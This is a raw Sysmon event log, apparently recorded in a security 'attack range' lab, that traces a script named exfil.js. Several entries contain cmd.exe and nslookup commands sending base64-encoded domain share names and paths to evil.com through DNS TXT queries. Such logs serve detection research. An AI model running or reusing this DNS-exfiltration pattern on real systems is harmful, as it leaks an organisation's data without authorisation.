2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.586{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlpnzb.tmpMD5=88CB44002509C6BB2D4BC0ADC4A5E028,SHA256=FA57CD8CDA118516C9A4FB97A60BCAFFDFC289CB501CF1DABE54CCC933EB8213,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.548{2E1864BB-18F4-629A-D844-000000005F02}48284632C:\Windows\system32\conhost.exe{2E1864BB-18F4-629A-D944-000000005F02}6512C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.548{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.548{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.548{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.548{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.548{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-D944-000000005F02}6512C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.548{2E1864BB-18F4-629A-D744-000000005F02}61487852C:\Windows\system32\cmd.exe{2E1864BB-18F4-629A-D944-000000005F02}6512C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.558{2E1864BB-18F4-629A-D944-000000005F02}6512C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F4-629A-D744-000000005F02}6148C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpnzb.tmp 2>&1 10341000x8000000000000000211951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.533{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F4-629A-D844-000000005F02}4828C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.533{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F4-629A-D844-000000005F02}4828C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.517{2E1864BB-18F4-629A-D844-000000005F02}48284632C:\Windows\system32\conhost.exe{2E1864BB-18F4-629A-D744-000000005F02}6148C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.517{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-D844-000000005F02}4828C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.502{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.502{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.502{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.502{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.502{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-D744-000000005F02}6148C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.502{2E1864BB-18E0-629A-6742-000000005F02}39763548C:\Windows\System32\WScript.exe{2E1864BB-18F4-629A-D744-000000005F02}6148C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.512{2E1864BB-18F4-629A-D744-000000005F02}6148C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpnzb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.502{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsdh.tmpMD5=CB596D298926BB7548136A14BD30FF7C,SHA256=F828C268F75B06BE1AA98CB1BF6D08702D0B68C46C1A2B67F8CB9ED67478BB62,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.486{2E1864BB-18F4-629A-D544-000000005F02}67126108C:\Windows\system32\conhost.exe{2E1864BB-18F4-629A-D644-000000005F02}1188C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.486{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.486{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.486{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.486{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.486{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-D644-000000005F02}1188C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.486{2E1864BB-18F4-629A-D444-000000005F02}51928040C:\Windows\system32\cmd.exe{2E1864BB-18F4-629A-D644-000000005F02}1188C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.486{2E1864BB-18F4-629A-D644-000000005F02}1188C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F4-629A-D444-000000005F02}5192C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsdh.tmp 2>&1 10341000x8000000000000000211931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.464{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F4-629A-D544-000000005F02}6712C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.464{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F4-629A-D544-000000005F02}6712C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 